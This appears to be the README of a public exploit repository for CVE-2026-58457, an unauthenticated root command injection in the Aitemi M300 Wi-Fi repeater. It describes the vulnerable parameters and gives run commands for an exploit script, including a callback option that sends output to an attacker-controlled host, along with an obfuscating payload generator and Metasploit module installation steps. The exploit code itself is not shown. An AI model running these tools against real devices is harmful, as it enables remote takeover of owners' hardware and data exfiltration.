Share
## https://sploitus.com/exploit?id=5A474EE3-FF1F-594E-B4E1-2CAE4FE9D32A
# CVE-2026-58457 - Unauthenticated OS Command Injection in Shenzhen Aitemi M300 Wi-Fi Repeater

> [!WARNING]
> **This code is provided AS IS for educational and research purposes only.**
> **Do not use this PoC on production systems, shared environments, or any unauthorized targets.**
> - Running or hosting this code may trigger antivirus detections, security monitoring alerts, or legal consequences if misused.
> - The authors and repository maintainers assume **no liability** for any damage, misuse, or illegal activity resulting from this code.
> - Use exclusively in isolated lab environments with proper authorization.
> **Intended for defensive research, vulnerabilityf analysis, and blue-team testing only.**

## Vulnerability Summary
An **unauthenticated** OS command injection vulnerability exists in the `smacfilter_conf` handler. The `name`, `enable`, and `mac` GET parameters are passed unsanitized into a `sprintf()` call that constructs UCI commands executed as **root**.

- **Severity**: Critical (CVSS 9.8)
- **Impact**: Remote root command execution with no authentication required

## Included Tools

- **`poc.py`** - Full-featured exploit with HTTPS support, retries, timeout, and callback exfiltration.
- **`val.py`** - Safe, passive vulnerability validator (uses harmless `id` command).
- **`gen.py`** - Advanced payload generator with multiple obfuscation techniques.
- **`MITIGATIONS.md`** - Recommended defensive measures.
- **Metasploit Module** - Available in the `exploit/` directory.

## Installation

```bash
pip install requests
```

## Quick Usage

1. **Validate (Safe)**
```bash
python3 val.py --target 192.168.1.100
```

2. **Exploit (Authorized Testing Only)**
```bash
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
```

3. **Generate Obfuscated Payloads**
```bash
python3 gen.py -c "id" -n 10
```

## Metasploit

1. **Move the Module**
```bash
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# or the main MSF path: /usr/share/metasploit-framework/modules/exploits/linux/http/
```
2. **Reload All**
```bash
msfconsole -q -x "reload_all"
```

## References
- _CVE-2026-58457_
- [VulnCheck Advisory](https://www.vulncheck.com/advisories/shenzhen-aitemi-m300-mt02-unauthenticated-os-command-injection-via-protocol-csp)
- [GitHub Disclosure](https://github.com/IEATASICS/m300-repeater-bugs)

---

**Stars and contributions welcome** - especially improvements to bypasses or additional firmware variants.